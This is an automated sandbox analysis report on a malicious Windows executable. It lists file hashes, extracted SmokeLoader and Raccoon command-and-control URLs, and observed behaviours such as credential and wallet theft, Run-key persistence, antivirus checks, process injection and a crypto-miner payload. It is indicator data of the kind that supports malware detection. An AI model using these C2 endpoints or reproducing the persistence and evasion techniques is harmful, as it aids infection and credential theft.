Analysis
-
max time kernel
220s -
max time network
593s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 22:06
Static task
static1
Behavioral task
behavioral1
Sample
29DEA0BA258723098A514297F4C4D0B7.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
29DEA0BA258723098A514297F4C4D0B7.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
29DEA0BA258723098A514297F4C4D0B7.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
29DEA0BA258723098A514297F4C4D0B7.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
29DEA0BA258723098A514297F4C4D0B7.exe
Resource
win7v20201028
General
-
Target
29DEA0BA258723098A514297F4C4D0B7.exe
-
Size
9.1MB
-
MD5
29dea0ba258723098a514297f4c4d0b7
-
SHA1
7e6320fa26dd41b212ed9fac3cf3c61919af5325
-
SHA256
cf1a8304da78b6286a412d33ef3e0390949eb83e5b08ad63c006ed578d5d4c95
-
SHA512
918dcf85de3ca63869d9771d440d0dfd31447b8433842af8395b987f1cd761b5d5589a7e4fd2e01301c9831db39f105ae8ee9b46b58fa32d3a21ec1d78c28cbd
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
metasploit
windows/single_exec
Extracted
raccoon
9420f36ff86e78bbb8ce4073fa910f921ce2bebf
-
url4cnc
https://tttttt.me/hobamantfr1
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Glupteba Payload 3 IoCs
Processes:
resource yara_rule behavioral3/memory/188-311-0x0000000002520000-0x0000000002E2A000-memory.dmp family_glupteba behavioral3/memory/188-313-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral3/memory/188-312-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
Processes:
WerFault.execlient32.exeWerFault.exedescription pid process target process PID 5888 created 508 5888 WerFault.exe RunWW.exe PID 8268 created 5336 8268 client32.exe MicrosoftEdgeCP.exe PID 8256 created 6752 8256 WerFault.exe win1host.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 5 IoCs
Processes:
resource yara_rule behavioral3/memory/7720-668-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/7720-682-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/7720-700-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6672-988-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6672-1036-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 13 IoCs
Processes:
MsiExec.exemsiexec.exepowershell.exemsiexec.exeflow pid process 225 8104 MsiExec.exe 228 8104 MsiExec.exe 225 8104 MsiExec.exe 236 8104 MsiExec.exe 238 8104 MsiExec.exe 239 8104 MsiExec.exe 225 8104 MsiExec.exe 225 8104 MsiExec.exe 373 7720 msiexec.exe 228 8104 MsiExec.exe 228 8104 MsiExec.exe 447 4408 powershell.exe 511 6672 msiexec.exe -
Drops file in Drivers directory 5 IoCs
Processes:
DrvInst.exeppppppfy.exeMicrosoft.exedescription ioc process File created C:\Windows\System32\drivers\SET2FFA.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ppppppfy.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Microsoft.exe File opened for modification C:\Windows\System32\drivers\SET2FFA.tmp DrvInst.exe -
Executes dropped EXE 64 IoCs
Processes:
hjjgaa.exeRunWW.exejg7_7wjg.exeLabPicV3.exelylal220.exe22.exeguihuali-game.exeHookSetp.exeThree.exeLabPicV3.tmplilalmix.exelylal220.tmploli.exeMicrosoft.exeppppppfy.exejfiag3g_gg.exemultitimer.exesetups.exesetups.tmpprolab.exeFuwivodaepi.exeGetupycore.exeprolab.tmpirecord.exeDozhepohyqo.exePeshedijuzha.exeirecord.tmpjfiag3g_gg.exemultitimer.exemultitimer.exemd6_6ydj.exeaskinstall31.exetoolspab1.exetoolspab1.execpyrix.exeei111qo1fyj.exevict.exetyhrqw4xlm3.exeSetup3310.exe01ltqhcgv4q.exeapp.exevpn.exeei111qo1fyj.tmpSetup3310.tmpvict.tmpvpn.tmpIBInstaller_97039.exenrl0jkg334t.exeIBInstaller_97039.tmpwinlthsth.exeloli.exewin1host.exemd6_6ydj.exeaskinstall31.exetoolspab1.exetoolspab1.exetapinstall.exeSetup.exeFull Program Features.exe1.exe2.exemask_svc.exemask_svc.exe804C.exepid process 2736 hjjgaa.exe 508 RunWW.exe 3836 jg7_7wjg.exe 3096 LabPicV3.exe 696 lylal220.exe 2640 22.exe 184 guihuali-game.exe 2976 HookSetp.exe 3200 Three.exe 1292 LabPicV3.tmp 2648 lilalmix.exe 804 lylal220.tmp 740 loli.exe 4220 Microsoft.exe 4248 ppppppfy.exe 4388 jfiag3g_gg.exe 4928 multitimer.exe 5020 setups.exe 4228 setups.tmp 3420 prolab.exe 3412 Fuwivodaepi.exe 1128 Getupycore.exe 4264 prolab.tmp 4804 irecord.exe 4748 Dozhepohyqo.exe 4800 Peshedijuzha.exe 4392 irecord.tmp 504 jfiag3g_gg.exe 4284 multitimer.exe 3956 multitimer.exe 5416 md6_6ydj.exe 5724 askinstall31.exe 6132 toolspab1.exe 5296 toolspab1.exe 6080 cpyrix.exe 3772 ei111qo1fyj.exe 5836 vict.exe 5204 tyhrqw4xlm3.exe 5916 Setup3310.exe 6040 01ltqhcgv4q.exe 188 app.exe 5080 vpn.exe 5236 ei111qo1fyj.tmp 5512 Setup3310.tmp 1720 vict.tmp 5704 vpn.tmp 6088 IBInstaller_97039.exe 1000 nrl0jkg334t.exe 6200 IBInstaller_97039.tmp 6656 winlthsth.exe 6696 loli.exe 6752 win1host.exe 6816 md6_6ydj.exe 7024 askinstall31.exe 6348 toolspab1.exe 6116 toolspab1.exe 5364 tapinstall.exe 6768 Setup.exe 5620 Full Program Features.exe 7524 1.exe 7836 2.exe 1268 mask_svc.exe 2636 mask_svc.exe 4964 804C.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Processes:
resource yara_rule C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe vmprotect C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe vmprotect -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
setups.tmpsetups.tmpFuwivodaepi.exeDozhepohyqo.exesetups.tmpclient32.exesetups.tmpdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation Fuwivodaepi.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation Dozhepohyqo.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation client32.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 64 IoCs
Processes:
LabPicV3.tmplylal220.tmprundll32.exerundll32.exesetups.tmptoolspab1.exeei111qo1fyj.tmpSetup3310.tmpvict.tmpvpn.tmpIBInstaller_97039.tmpnrl0jkg334t.exetoolspab1.exeloli.exeMsiExec.exeMsiExec.exemask_svc.exesetups.tmp90E8.exerundll32.exeRunWW.exepid process 1292 LabPicV3.tmp 804 lylal220.tmp 4672 rundll32.exe 5112 rundll32.exe 4228 setups.tmp 4228 setups.tmp 4228 setups.tmp 4228 setups.tmp 4228 setups.tmp 4228 setups.tmp 4228 setups.tmp 5296 toolspab1.exe 5236 ei111qo1fyj.tmp 5512 Setup3310.tmp 5512 Setup3310.tmp 1720 vict.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 6200 IBInstaller_97039.tmp 1000 nrl0jkg334t.exe 6116 toolspab1.exe 6696 loli.exe 6696 loli.exe 2792 MsiExec.exe 2792 MsiExec.exe 2792 MsiExec.exe 8104 MsiExec.exe 8104 MsiExec.exe 8104 MsiExec.exe 8104 MsiExec.exe 8104 MsiExec.exe 8104 MsiExec.exe 8104 MsiExec.exe 8104 MsiExec.exe 8104 MsiExec.exe 8104 MsiExec.exe 7728 mask_svc.exe 7728 mask_svc.exe 7728 mask_svc.exe 7728 mask_svc.exe 7728 mask_svc.exe 7728 mask_svc.exe 4628 setups.tmp 4628 setups.tmp 4628 setups.tmp 4628 setups.tmp 4628 setups.tmp 4628 setups.tmp 4628 setups.tmp 5704 vpn.tmp 5704 vpn.tmp 8004 90E8.exe 1052 rundll32.exe 508 RunWW.exe 508 RunWW.exe 8004 90E8.exe 8004 90E8.exe 8004 90E8.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
Processes:
multitimer.exemultitimer.exemultitimer.exehjjgaa.exeppppppfy.exeMicrosoft.exemultitimer.exe20DD.tmp.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\bsnuqekbzxd = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\UA7OJ5RCK1\\multitimer.exe\" 1 3.1617574046.606a389e5730c" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\elupfll5n5v = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\6GMXAJKZY0\\multitimer.exe\" 1 3.1617574195.606a3933ba78a" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\xnblcnczfxs = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\GPT532NZPG\\multitimer.exe\" 1 3.1617574203.606a393bb086b" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Gaewemovaje.exe\"" ppppppfy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Naebafewyvi.exe\"" Microsoft.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ljhbd1qbsku = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\X2NSOCC3B4\\multitimer.exe\" 1 3.1617574122.606a38eaa4b7a" multitimer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 20DD.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" 20DD.tmp.exe -
Checks for any installed AV software in registry 1 TTPs 64 IoCs
Processes:
multitimer.exemultitimer.exemultitimer.exemultitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg7_7wjg.exemd6_6ydj.exemd6_6ydj.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg7_7wjg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md6_6ydj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md6_6ydj.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
nrl0jkg334t.exemsiexec.exedescription ioc process File opened (read-only) \??\G: nrl0jkg334t.exe File opened (read-only) \??\V: nrl0jkg334t.exe File opened (read-only) \??\Z: nrl0jkg334t.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: nrl0jkg334t.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: nrl0jkg334t.exe File opened (read-only) \??\Q: nrl0jkg334t.exe File opened (read-only) \??\W: nrl0jkg334t.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: nrl0jkg334t.exe File opened (read-only) \??\K: nrl0jkg334t.exe File opened (read-only) \??\R: nrl0jkg334t.exe File opened (read-only) \??\Y: nrl0jkg334t.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\I: nrl0jkg334t.exe File opened (read-only) \??\N: nrl0jkg334t.exe File opened (read-only) \??\O: nrl0jkg334t.exe File opened (read-only) \??\T: nrl0jkg334t.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: nrl0jkg334t.exe File opened (read-only) \??\P: nrl0jkg334t.exe File opened (read-only) \??\U: nrl0jkg334t.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: nrl0jkg334t.exe File opened (read-only) \??\X: nrl0jkg334t.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\F: nrl0jkg334t.exe File opened (read-only) \??\M: nrl0jkg334t.exe File opened (read-only) \??\S: nrl0jkg334t.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\J: nrl0jkg334t.exe File opened (read-only) \??\W: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 496 ipinfo.io 544 ipinfo.io 598 ip-api.com 13 ip-api.com 139 ipinfo.io 141 ipinfo.io 353 ipinfo.io 469 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Program crash 15 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4424 508 WerFault.exe RunWW.exe 5480 508 WerFault.exe RunWW.exe 7988 508 WerFault.exe RunWW.exe 7692 508 WerFault.exe RunWW.exe 7596 508 WerFault.exe RunWW.exe 2840 508 WerFault.exe RunWW.exe 5720 508 WerFault.exe RunWW.exe 4820 508 WerFault.exe RunWW.exe 5888 508 WerFault.exe RunWW.exe 8268 5336 WerFault.exe MicrosoftEdgeCP.exe 8256 6752 WerFault.exe win1host.exe 7924 2700 WerFault.exe MicrosoftEdge.exe 5220 8448 WerFault.exe MicrosoftEdgeCP.exe 6932 9732 WerFault.exe MicrosoftEdgeCP.exe 6552 8544 WerFault.exe MicrosoftEdgeCP.exe -
Drops file in System32 directory 21 IoCs
Processes:
DrvInst.exesvchost.exeFull Program Features.exesvchost.exeDrvInst.exedescription ioc process File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502} DrvInst.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\GX4J1UB5.cookie svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\SET2B95.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\tap0901.cat DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\SET2BA7.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF Full Program Features.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 94263B17B05E3BEC svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\SET2B96.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\SET2BA7.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\GX4J1UB5.cookie svchost.exe File created C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\SET2B96.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\SET2B95.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\tap0901.sys DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
mask_svc.exemask_svc.exemask_svc.exepid process 1268 mask_svc.exe 2636 mask_svc.exe 7728 mask_svc.exe -
Suspicious use of SetThreadContext 14 IoCs
Processes:
svchost.exetoolspab1.exeloli.exetoolspab1.exe1.exe2.exelilalmix.exe20DD.tmp.exeE36F.exe1.exe2.exedescription pid process target process PID 3632 set thread context of 4780 3632 svchost.exe svchost.exe PID 6132 set thread context of 5296 6132 toolspab1.exe toolspab1.exe PID 740 set thread context of 6696 740 loli.exe loli.exe PID 6348 set thread context of 6116 6348 toolspab1.exe toolspab1.exe PID 7524 set thread context of 7464 7524 1.exe 1.exe PID 7836 set thread context of 5068 7836 2.exe 2.exe PID 2648 set thread context of 5796 2648 lilalmix.exe lilalmix.exe PID 4100 set thread context of 7720 4100 20DD.tmp.exe msiexec.exe PID 4100 set thread context of 7184 4100 20DD.tmp.exe msiexec.exe PID 5328 set thread context of 8920 5328 E36F.exe E36F.exe PID 5396 set thread context of 8784 5396 1.exe 1.exe PID 4728 set thread context of 6628 4728 2.exe 2.exe PID 4100 set thread context of 6672 4100 20DD.tmp.exe msiexec.exe PID 4100 set thread context of 8628 4100 20DD.tmp.exe Conhost.exe -
Drops file in Program Files directory 64 IoCs
Processes:
